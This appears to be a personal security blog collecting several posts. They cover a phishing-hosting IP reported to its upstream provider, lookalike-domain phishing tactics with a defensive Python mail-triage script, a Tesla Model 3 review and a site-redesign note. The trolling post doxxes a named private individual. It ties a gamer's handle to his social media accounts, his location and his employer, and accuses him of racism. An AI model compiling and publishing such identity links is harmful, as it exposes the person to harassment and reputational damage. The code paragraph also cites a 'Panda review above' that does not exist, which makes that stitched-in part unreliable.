8/14 – The IP still has dozens of phishing sites, malware binaries and botnet communication files hosted on it. I’ve been e-mailing this information to the upstream provider, QuadraNet. The colocation customer this IP belongs to either doesn’t have the time to keep an eye on this or doesn’t know how to stop these phishermen. It’s also possible the server is compromised, or that the operator AlphaRacks is complicit in the activity. I found that the blocks used to be owned by Crissic Solutions (Skylar MacMinn, Germany), who both worked at Quadranet and occupied the same IP space. An unknown entity was selling AlphaRacks on a web forum about 4 years ago at post#1 post#2.

8/7 – The IP continues to host phishing activity. We have reported additional sites to QuadraNet, who will presumably notify the colocation client again. Keep in mind we noticed this activity start trending upward in March of 2018, so they’ve been outsmarting both of these parties for a good deal of time, nearly half of 2018.

7/23 – QuadraNet has notified me that they are going to “null-route the IP address and reach out to our customer, they may not have been aware of the number of domains involved,” after they had repeatedly asked the customer to disable these services. The IP went down and was back up within a few hours. We confirmed it still had 5+ phishing sites live on it and reported that back to QuadraNet. We suspect the client is Alpharacks Hosting and that up to 1,200 domains may be on this server, most of them malicious.

Screenshots below:

I’ve reported this to QuadraNet and PhishTank. Google Chrome warned against visiting many of the sites hosted on this IP.

Phishing – New Tactics and Techniques


We’ve recently observed a new trend in phishing and targeted malware attacks that use freshly registered lookalike domains to bypass anti-spam. The attackers use valid domains, SPF records, working SMTP servers, and reply addresses that mimic newsletter bouncebacks. These tactics allow the messages to bypass reputation and similar checks.

The attachments are typical droppers: highly obfuscated Microsoft Word documents with macros. Vendors detected the attachments under names such as Trojan-Downloader, VBA.Agent, and Exploit.Siggen, the last of which leverages Office CVE-2017-0199.

Domains (with VirusTotal link):

DocuSign – docusign.delivery

Bank Of America – securemsg-bankofamerica.com

Internal Revenue Service – irsinvoice.com

Dunn & Bradstreet – dnbdocuments.com

Tactics and Techniques:

Attackers are using return addresses that resemble a real newsletter bounceback.

SPF records exist for the domain, and they match the servers that send the targeted emails. Those hosts are online and answer SMTP connections with a banner matching the domain.

Attackers are using VPS or full-service hosting accounts at providers such as LeaseWeb and Secure Servers LLC to launch the attacks. The hosts have remote administration ports and services open.

Incoming emails are highly obfuscated by a randomly generated Word document with macros. Attackers will change the payload if a “virus” rejection is received. If it’s an RBL rejection, they switch to another SMTP address and continue to hammer the system until it allows a delivery. Messages are modified in near real time after each rejection, until one is accepted.

Fighting Back:

If I had not configured a HOLD on documents with macros, these would have been delivered by my spam provider. I had an option configured to recognize “Newly Observed Domain,” but it didn’t recognize them, and it wasn’t set to block them. It may be a good idea to inspect these manually, or you could put in some kind of workflow for content examination to alert you when they are delivered. I’m looking for keywords like the ones below, and I’m also scanning some of the messages:

Account Locked
EFax
Hello Dear
Parcel
Password Reset
Shipment
Suspended Account
Unusual Sign-In
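One added example (my own code, not the spam provider’s feature) that covers both the keyword inspection and macro HOLD described here and the dropper problem from the Panda review above: it parses a raw message, flags a sender domain that merely contains a brand name, lists the subject keywords that hit, and checks every attachment for a VBA project, so the document is caught before any PowerShell runs. The brand table and the sample message are constructed; the docusign.delivery domain, the SPF result and the attachment filename come from this post, while the sender local part, recipient and body are made up.

```python
import io
import re
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage

# Assumed brand table: the real sending domains of the brands impersonated in the post.
BRAND_DOMAINS = {
    "docusign": ("docusign.com", "docusign.net"),
    "bankofamerica": ("bankofamerica.com",),
    "irs": ("irs.gov",),
    "dnb": ("dnb.com",),
}
# Subject keywords from the post, lower-cased for matching
HOLD_KEYWORDS = ("account locked", "efax", "hello dear", "parcel", "password reset",
                 "shipment", "suspended account", "unusual sign-in")
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def has_vba(blob):
    """True if an Office file carries a VBA project. OOXML (docx/docm/xlsm) keeps it in a
    vbaProject.bin zip part; legacy OLE2 (.doc/.xls) stores directory-entry names as UTF-16LE,
    so a _VBA_PROJECT name in the raw bytes is a cheap indicator (heuristic, not a full CFB parse)."""
    if blob.startswith(b"PK"):
        try:
            with zipfile.ZipFile(io.BytesIO(blob)) as z:
                return any(name.lower().endswith("vbaproject.bin") for name in z.namelist())
        except zipfile.BadZipFile:
            return False
    if blob.startswith(OLE_MAGIC):
        return "_VBA_PROJECT".encode("utf-16-le") in blob
    return False


def lookalike_brand(domain):
    """Brand a sender domain imitates, or None: the domain contains the brand token but is neither
    the brand's own domain nor a subdomain of it (docusign.delivery, securemsg-bankofamerica.com)."""
    d = domain.lower()
    squashed = re.sub(r"[^a-z0-9]", "", d)
    for brand, real in BRAND_DOMAINS.items():
        if brand in squashed and d not in real and not d.endswith(tuple("." + r for r in real)):
            return brand
    return None


def spf_result(msg):
    m = re.search(r"\bspf=(\w+)", msg.get("Authentication-Results", ""))
    return m.group(1).lower() if m else "none"


def triage(raw):
    """HOLD/DELIVER decision for one raw RFC 5322 message, with the reasons."""
    msg = message_from_bytes(raw, policy=policy.default)
    reasons = []
    m = re.search(r"@([\w.-]+)", msg.get("From", ""))
    sender_domain = m.group(1).lower() if m else ""
    brand = lookalike_brand(sender_domain)
    if brand:
        # SPF pass only proves the attacker controls DNS for the lookalike; it never clears it
        reasons.append(f"sender domain {sender_domain} imitates {brand} (spf={spf_result(msg)}, which does not help)")
    subject = (msg.get("Subject") or "").lower()
    hits = [k for k in HOLD_KEYWORDS if k in subject]
    if hits:
        reasons.append("subject keywords: " + ", ".join(hits))
    for part in msg.iter_attachments():
        if has_vba(part.get_payload(decode=True) or b""):
            reasons.append(f"attachment {part.get_filename()} contains a VBA macro project")
    return {"action": "HOLD" if reasons else "DELIVER", "reasons": reasons}


def docm_with_macro():
    """Minimal OOXML container with a vbaProject.bin part: a constructed stand-in for the dropper."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/vbaProject.bin", OLE_MAGIC + b"\x00" * 32)
    return buf.getvalue()


def build_sample(with_macro=True):
    """Constructed message in the shape the post describes; local part, recipient and body are made up."""
    msg = EmailMessage()
    msg["From"] = "DocuSign <noreply@docusign.delivery>"
    msg["To"] = "finance@example.com"
    msg["Subject"] = "Unusual sign-in activity - document 3873JDSB987391"
    msg["Authentication-Results"] = "mx.example.com; spf=pass smtp.mailfrom=docusign.delivery"
    msg.set_content("Please review the attached document.")
    payload = docm_with_macro() if with_macro else b"%PDF-1.4 harmless"
    msg.add_attachment(payload, maintype="application", subtype="msword", filename="3873JDSB987391.doc")
    return bytes(msg)


if __name__ == "__main__":
    print(triage(build_sample()))
```

Two caveats from running this in anger: the short brand tokens (irs, dnb) will also match unrelated domains such as firstbank, so tighten them with word boundaries or a longer token list before putting this in a mail flow; and the OLE check is a byte-level heuristic, so a packer that encrypts the container will hide the name, which is a reason to HOLD on the file type alone when the sender is unknown.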

 

Domain #1

docusign.delivery

 

Domain record shows that it was registered today:

Here’s the SPF record for docusign.delivery:

SMTP server at the host answers on behalf of this domain as well for spam filters that form a connection back to the system during validation:

The sender passes SPF checks because they’re using a legitimate domain:

spf=pass (spfCheck: domain of docusign.delivery designates 95.211.148.208 as permitted sender) client-ip=95.211.148.208; [email protected]y; helo=docusign.delivery
Content-Type: multipart/mixed;

 

Nmap results show smtp/25 is open, and proxy/8080 is listening. Neither is an open relay, so we assume the attacker configured for quick remote access and spamming:

 

Email content was a word document:

Content-Disposition: attachment; filename="3873JDSB987391.doc"
Content-Transfer-Encoding: base64
Content-Type: application/msword; name="3873JDSB987391.doc"

Domain #2

securemsg-bankofamerica.com

 

SPF:

 

Domain #3

IRSInvoice.com

 

SPF:

Domain #4

DNBDocuments.com

 

Trolling – Hate and Video Games


I started thinking about this topic, and ultimately a blog, when a troll was repeatedly scrolling the “N” word on a video game I was playing last night. What’s more, this person felt comfortable doing it in front of 64+ other folks of unknown age, or ethnic backgrounds who were playing the game with us! I thought to myself, who are these trolls? What drives them? Do they have jobs or a family? I got the sense that hate goes deep into the psyche of the individual. I often times wonder, do they feel the way they hate? Or, do they hate the way that they feel?


If your attitude informs behavior, then typing that word over and over means that you are:

  1. Clearly racist, and
  2. Feeling untouchable because you are on the internet.

Just for kicks, I made a simple investigation into this person via public databases like Google and other websites. The most interesting thing was that the nickname he used seemed to be a real name, not a typical handle like “deathwarriorbot.” Well, that piqued my interest, and it didn’t take long to find out who may have allegedly been behind the hate – read on, and I’ll tell you what I found.

It’s official that the internet has become a cesspool of carbon copy trolls. There are many ways hate speech spreads online, and it seems to be getting worse. Twitter users line up to target people, and then anonymously rip them to shreds for fun and good times. It’s a psychological warfare, and these seemingly anonymous trolls have flourished in an environment of little accountability. I know quite a bit about trolling, especially since I hacked from the early 90s until the mid-2000s; in fact, many of us trolls were hackers, information gatherers, and pranksters. We’d make phone calls to friends and other individuals, playing various jokes, some cruel, but nothing that could ruin a person’s life, and we’d never use hate speech to attack others. Sites like Twitter have given just about everyone a “voice” and can be highly politicized at times, littered with pure hate and negativity. Remember the old saying “Opinions are like a**holes, everybody has one”? Well, it’s true, and while I support free speech, I don’t condone speech that is hateful or intolerant. Honestly, I don’t like to read any comments nowadays, given the climate of trolls who are hate mongers.

It seems that with the rapid growth of the internet, many of these people don’t care about being anonymous, as long as they can broadcast their message. There’s plenty of coverage on the psychology of why they do this, and on how the internet makes them feel powerful. I know this firsthand, as I’ve seen more than one Twitter or YouTube account with little to no followers or hits, yet they carry on as if they’re on a podium of power, albeit a tiny one. Does that stop these people from thinking that somebody is listening? No. I don’t know what they call the disorder of having a disproportionate belief about your perceived power online versus offline, but I bet it’s hard to pronounce.

For example, in the political realm, a person’s beliefs seem to unconsciously be a part of his or her identity. If you attack a political figure, it is perceived as if you are attacking them directly at the core of what they believe. Attackers become stereotypical gang members who can take down any target at will. They preach division, not inclusion, and I think most of the time we have no idea who they really are. And because there’s proof that Russia and other countries have been behind many efforts to sway U.S. public opinion, it’s obvious that they do not reflect who we are as Americans – if they are from the U.S. at all.

To quote a favorite author of mine, Alan Weiss, from his Balancing Act blogs, “The human condition is not necessarily one of polarization. While tribes and cultures have been fighting for land and resources and power for millennia, they have also been able to come together for mutual benefit. The right to disagree, debate, and demur is important, even vital. But the belief that you’re with us or against us, you’re friend or enemy, is absurd. Despite the fact we may agree on a hundred other issues, this one issue creates an impregnable divide? Like the starship Enterprise, the emotional “shields” descend and prevent rational discourse and even logic from penetrating. You’re the “enemy,” so I have no intention of listening. Confirmation bias is viciously in play with highly emotional subjects: climate change, abortion, vivisection, politics, health care, welfare, education. That’s because passionate beliefs need to be shored up at all costs, and we’re reluctant to listen to evidence to the contrary with any objectivity at all. We need to stop searching solely for opinion and information that support our point of view (which is most of the activity on Facebook, by the way). As intelligent beings, we owe it to ourselves and our society to deliberately pursue varied points of view to draw our own rational conclusions.” I couldn’t have said it better, and I didn’t try.

So what can we do about trolls? Report them? Shame them publicly? Invite them to an MMA fight to ‘work things out’? I’d love that, but cowards typically won’t reveal themselves. It takes away their power when you can identify them, and for a troll, having the ‘docs’ on somebody is the ultimate weapon. It usually goes from politics to ad hominem (against the person), as you have to remember, this is about the ego defending one’s personal ‘identity.’ Nowadays, ignorant, intolerant college students shout at and shut down speakers with whom they disagree. What’s wrong with these students? Maybe we need accountability by lifting the mask of who’s behind the hate, and then it will be more apparent to trolls that their actions have consequences.

Now, on to the incident from last night… Note: there is explicit content in a racial slur, shown in a screenshot below.

Unmasking the Hate

Disclaimer: The information provided is as-is, and we do not condone the harassment of any individual, or hate speech. We are not stating it is a fact that this person conducted these activities, only sharing screenshots of a correlation between the name on this game, and what was found on Google. We are not ‘attacking’ this person, merely following a logical investigative path to uncover information. We are not accusing them of a crime, or wrongdoing. Do not attempt to call, e-mail, tweet, or harass this person based on this information. The purpose of providing this information is to offer a perspective into a situation that I directly witnessed, and impacted me personally. I’ve only compiled information from Google searches and added the perspective of any typical internet user.

*** Update 11/7/2018 – Ran into Nathan again on his foul racist tear in the game Battlefield. In this case I prompted him, “Nathan, why are you so mad?” to which he answered (confirming that he is in fact Nathan at the helm) that it’s “because of noobs”.


Original Story:

Screenshot of a user ‘NthnKirsch2’ writing vulgarities over and over, an estimated 100 times throughout the game in Battlefield 4, shown below:

Wait, there’s a Twitter account @nthnkirsch2, what are the odds? Probably just a coincidence, I mean we can’t confirm this guy is the same person, right?

Support for politics correlates with another comment on Steve Bannon

Hmm, the account for his game below seems to have the same picture. But hey, maybe it’s just another coincidence. Oh wait, it could be that a family member uses the account. Maybe a bad little brother, I mean that would explain it, right?

It looks like somebody using Nathan’s account petitioned to have a ban removed, for guess what? None other than racial slurs. This happened back in 2014, so either his “little brother” (Nathan was 34 at the time) is back with a vengeance, trying to throw dirt on his name, or it’s a cover-up.

In the blog posting, there’s a reference linking the alias nthnkirsch1, a member of Steam that says the user is from North Carolina. This is important because in the LinkedIn below the primary education of the user is Duke University, located in North Carolina. There is another Nathan I found in NC, and he’s still in college, not a 38-year-old male like the one shown above.

Instagram account forms another nexus between nthnkirsch1 and nthnkirsch2.

It seems like this hateful user shares a bit of ‘gaming rage’ with his little brother (if he actually exists). Earlier this year he was complaining about hacks, cheaters, and issues using the game. This is similar to the comments in the game of ‘nice hack’, and seems to fit pretty well with the first image:

Found a comment here with hate speech by user Nthnkirsch2:

Here’s a Facebook account, which we assume is the same Nathan. He’s living in PA, and self-employed.

A quick search on LinkedIn finds one Nathan Kirsch, from PA. Unless there are two people named Nathan Kirsch in the same town in PA? He appears well educated, from Duke (North Carolina), for a person spewing this kind of racism (little brother?), and is currently the CEO at Radon Be Gone, primarily serving people in Colorado, Idaho, Montana, Nevada, and Wyoming.

Confirmed by other information available on the internet, simply by searching the name we found in the game, nothing more. If Nathan is the one perpetrating this hate, then he hasn’t done much to cover up his tracks.

Any comments from Nathan Kirsch or Radon Be Gone? I’d be happy to discuss, and post your thoughts on the issue. Please advise, as I’d like for myself (and my little family members) to play a game without being exposed to hate speech. Nathan, if this was you, I hope it’s a lesson that not only should you be more careful about using your real name, but you should also have a bit of compassion for people of color. Something hateful is inside of you, and it seems to have been festering for a while. Why do you attack other people? What makes you so angry? If it was Nathan’s little brother, he’s been at this for years now, based on what we found online. I think it might be time for him to create his own accounts, and stop using the good name of his big brother.

I’m wondering if people like this can change – or become better by accepting a love for diversity? It’s hard to say, but I felt like using my voice here could shine a light on this issue, and show you that not all trolls are immature 12-year-old gamers who are not worth looking into. Some of these trolls and hate speech advocates appear to be well-educated CEOs, and they seem to have nothing better to do than spread hate – a clearly unsustainable way to live in the melting pot we call America.

Trolls just want to have fun, and unfortunately for them, that correlates strongly with sadism, psychopathy, and Machiavellianism. 

Tesla – Model 3 Test Drive and Winning Big


In recent news, people who wouldn’t ordinarily care about cars are obsessing about the numbers of Tesla, a billion-dollar corporation. They’re laying down strategies and pleading on Twitter with Elon Musk to see things another way. But will he? Should he?

Let me ask you something – when was the last time you spent more than your salary on a bet, like starting a business or perhaps an investment, where you directly contributed to the end goal? I think the vast majority of people would say that they have never done it and that they don’t know the first thing about managing themselves, never mind operating a company with 30k employees. Not only is it almost inconceivable from that perspective, it’s impossible to fully comprehend.

That’s why people with no money or experience in the auto industry can have a voice going play-by-play with Tesla on the internet. The news is promoting negative outlooks, and I think the advice is formulated for investors – not the long-term successes but the short-term payouts. All you have to do is read the news to drown in the numbers on last week’s growth. But who’s controlling the narrative, the investors? How about propaganda from the competition? Renowned Twitter experts can see that 3,750 + 1,250 (25% more) = 5,000, which is their calculated proof of the company’s future outlook. It’s simple, right? Let me try to break this down, at least from the tiny window we all look through while trying to figure out what’s going on inside of Tesla. Mind you, I’ve done little research, but I keep up with the barebones facts and Tesla’s statements, in general.

Tesla’s Fremont manufacturing plant was aiming to produce 2,500 cars per day. This was less than 90 days ago and under a different leadership. It looks to me like Elon is doing what most leaders can’t and won’t do – he’s getting out of the office chair and down on the production floor to see his goals come to fruition. It’s exciting and awe-inspiring. I’d be honored to work there right alongside him in that battle.

The problem with these news reports is that they’re from the perspective of contributors who are hung up on their own concerns (When can I leave?? 5 pm? Ugh!), and have limited visibility into the big picture. I’m sure the guy in the paint shop knows a ton about what’s going on, and I trust his casual observations from the floor without any question or hesitation. Wait, isn’t he supposed to be busy painting? The Fremont location alone has increased by 4,000 employees since June of 2016. Most of the haters Tesla talks about are either:

  1. Betting on the losses,
  2. Working with the competition, or
  3. Not qualified or informed enough to make an assessment.

Or maybe I’m just optimistic. I know what it’s like to work hard when everybody around you is doubtful, cynical, and spreading the worst outlook possible.

The Model 3 isn’t a myth. It’s a reality, and I know so because I drove a privately owned one recently for 3-4 days (VIN #9257). I’ve owned a variety of vehicles including Infiniti, Chrysler, Pontiac, Lincoln, Ford, and several others. In the last few years, I’ve rented at least 100 cars including Audi, BMW, Fiat, Mercedes, Lexus, Cadillac, Volkswagen, Subaru, Dodge, and the list goes on. Generally, the vehicles would have cost anywhere from $30k-$70k. I used these during my travels and would casually leverage a significant discount (50%) that I have with one company that’s local to my area. I’m not an expert on cars, but I have driven many of them, especially recently, so I know how frustrating all the quirks can be every time I change models and drive a different car around for two-and-a-half years. I’ve been frustrated by the unknown and puzzled by features, even where to pop the gas tank. How about Bluetooth issues? Ever reboot your phone or pair it five times to hear just five minutes of music? I’ve had dead batteries, overheating engines, and cars from hell that wouldn’t drive straight. And the majority of them were new cars with 0-20k miles!

The Model 3 was smooth on user experience, had tons of torque, and generally was fun to drive, unlike many other small, cramped, uncomfortable cars. I took several trips from Providence to Boston and back, only needing to recharge one time, and I started the trips with 20% battery. The technology was great and offered one of the most intuitive NAV experiences I’ve had to date. The car was just online, not tethering or using my phone as a hotspot. Tesla knows that small things make a difference, and the way the OS was set up is very intuitive. Overall, this car is reliable, and I’d be happy to own it after some time passes with the first generations. I think the key is just jumping in one and driving it on your terms. I highly recommend Turo.com for that, and then, only then, should you render an opinion. You could read about them for days and look at every picture of them on the internet. Just get in one and get going. They rock!

Whether you bet for or against Tesla, they are still a winner. The company is about disruption and pushing the limits, done in the spirit of being up against impossible odds. The story is just as exciting to me without having to know or consider thinking about how it will end.

Also see: The War on Tesla, Musk, and the Fight for the Future

Overview:

Long Range Battery (310mi.) (500km)

Premium Upgrades (full glass roof, heated seats, etc.)

0-60mph in 5.1 seconds

Enhanced Autopilot features: Lane Change, Autosteer, Side Collision Warning, Summon (coming soon), Automatic Parking, Emergency Braking

New Blog Design – Coming in July

Finishing up the final code for my 2018 redesign. My desk is getting a facelift, and there will be a fully responsive mobile site. I’ve been patching all the leaks and covering up code issues with various plug-ins, CDNs, and enhancements for far too long. I need to focus on device compatibility, and most importantly the readability of the blog. Fonts, colors, and the background should be adjusted to be easier on the eyes. I hope you enjoy it, and I’ll work to take more time to write useful content. I’m also working with an editor to proofread and organize my content better.

Note: I’ve actually got a bamboo top Jarvis Sit-Stand, Back App Chair, Dual Monitor Arm, 2x Dell S2318H, Contour Unimouse, RollerMouse Red, Logitech Z623, Google Pixel 2, Dell XPS 8390, Dell Latitude E5480, VSL188NC desk lamp, and 2 layers of 4x cheapo interlocking floor squares.

Thanks for reading, and stay safe.